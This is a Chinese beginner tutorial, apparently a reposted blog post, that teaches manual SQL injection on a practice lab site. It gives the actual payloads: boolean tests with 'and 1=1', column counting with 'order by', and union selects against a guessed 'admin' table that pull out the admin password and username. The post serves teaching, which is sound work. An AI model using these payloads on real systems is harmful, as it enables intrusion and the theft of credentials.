最最简单的SQL手工注入教学,我奶奶都会
Posted MachineGunJoe
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了最最简单的SQL手工注入教学,我奶奶都会相关的知识,希望对你有一定的参考价值。
这期教学是给小白学习的,大佬看看就好。
我们先打开靶场:【靶场】
我们先进去发现是一个很简单的页端。
我们先判断是否有注入。
我们先在链接后面添加: and 1=1
来判断是否有注入。
发现返回正常。
我们再在链接末尾输入:and 1=2
这里我们发现与之前and 1=1时的界面不一样了这就说明有注入。
(这里解释一下and 1=1是什么意思
其实很简单就是你问一个服务器1是不是=1
所以我们and 1=1
返回正常
and1=2就是问1是不是=2所以我们报错了)
我们还可以输入:
order by 1
和:order by 2
来进行判断。
然后我们再在链接后面添加:
union select 1 from admin
union select 1,2 from admin
union select 1,2,3 from admin
注:admin这个表是我猜出来的你们可以用工具去扫,因为我猜到账号密码会在admin里面
以此类推
我们发现
在 union select 1,2 from admin的时候
这里多了个2
咱们就把2给排除掉
把2替换成:password
password是密码的意思
注:因为我们需要在2这个表里面查找。
账号和密码的表名这个我们也得在表里面猜出来
在链接末端输入:and 1=2 union select 1,password from admin
好的我们现在发现了密码
密码为:hello hack
我们下一步开始查找账号
我们把:password替换成:username
注:这俩个一般都是默认为密码和账号的意思翻译一下就知道是什么意思了。
好的我们账号也出来了。
账号为:admin
密码为:hello hack
这是最基础的手注教程博主也是小白就让我们一起来学习进步吧!
以上是关于最最简单的SQL手工注入教学,我奶奶都会的主要内容,如果未能解决你的问题,请参考以下文章